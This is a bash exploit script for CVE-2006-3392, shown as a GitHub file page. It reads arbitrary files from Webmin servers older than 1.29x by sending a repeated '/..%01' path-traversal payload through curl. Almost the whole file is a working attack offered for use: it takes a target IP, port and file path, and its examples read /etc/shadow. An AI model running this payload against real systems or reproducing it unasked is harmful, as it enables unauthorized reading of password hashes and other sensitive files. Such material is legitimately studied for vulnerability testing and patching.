-
Notifications
You must be signed in to change notification settings - Fork 17
/
CVE-2006-3392.sh
83 lines (78 loc) · 2.48 KB
/
CVE-2006-3392.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/bin/bash
# CVE-2006-3392
# Exploit Webmin < 1.29x
# Arbitrary File Disclosure
# Allow Ctrl+C to kill pingsweep
trap '
trap - INT # restore default INT handler
kill -s INT "$$"
' INT
if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
# This option displays a help message and command execution examples
echo ""
echo "OsbornePro CVE-2006-3392 1.0 ( https://roberthosborne.com )"
echo ""
echo "USAGE: ./CVE-2006-3392.sh <target_ip> <port> http|https <path_to_file>"
echo ""
echo "OPTIONS:"
echo " -h : Displays the help information for the command."
echo ""
echo "EXAMPLES:"
echo " ./CVE-2006-3392.sh 10.10.10.141 80 http /etc/shadow"
echo " # This example reads /etc/shadow from the target 10.10.10.141"
echo ""
echo " ./CVE-2006-3392.sh 10.10.10.141 443 https /etc/shadow"
echo " # This example reads /etc/shadow from the target 10.10.10.141 using HTTPS"
echo ""
exit
# Variable validation------------------------------------------------
elif [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] || ERROR="Valid IP address was not defined. For more help use the -h option"; then
# Validate first parameter was defined correctly
if [ ! $ERROR ]; then
# Validate correct amount of positional parameters are defined
if [ -n "$5" ]; then
echo "Too many positional parameters have been defined. Execute './CVE-2006-3392.sh -h' for help"
echo ""
exit
fi
else
echo $ERROR
echo ""
exit
fi
# Validate positional parameter 2 is an integer between 1 and 65535
if [ "$2" -lt 65535 ] && [ "$2" -ge 1 ] || ERROR="The port you defined needs to be an integer between 1 and 65535"; then
if [ ! $ERROR ]; then
PORT=$2
else
echo $ERROR
echo ""
exit
fi
fi
# Validate positional parameter 3 is http or https
PROTOCOL=$(tr "[:upper:]" "[:lower:]" <<< "$3")
if [ "$PROTOCOL" == "http" ] || [ "$PROTOCOL" == "https"]; then
:
else
ERROR="Third parameter needs to be http or https"
if [ ! $ERROR ]; then
echo $ERROR
echo ""
exit
fi
fi
# If the file does not exist on the target curl will return a 404 error
fi
REPEAT='/..%01'
PAYLOAD=$(for i in $(seq 1 40); do echo -ne ${REPEAT}; done)
URI="unauthenticated${PAYLOAD}"
URL="${PROTOCOL}://${1}:${PORT}/${URI}${4}"
if [ $PROTOCOL == 'https' ]; then
curl -k -sL $URL -m 10
echo "${URL}"
elif [ $PROTOCOL == 'http' ]; then
curl -sL $URL -m 10
else
printf "I don't know what you did. Whatever it was was just wrong :)\n"
fi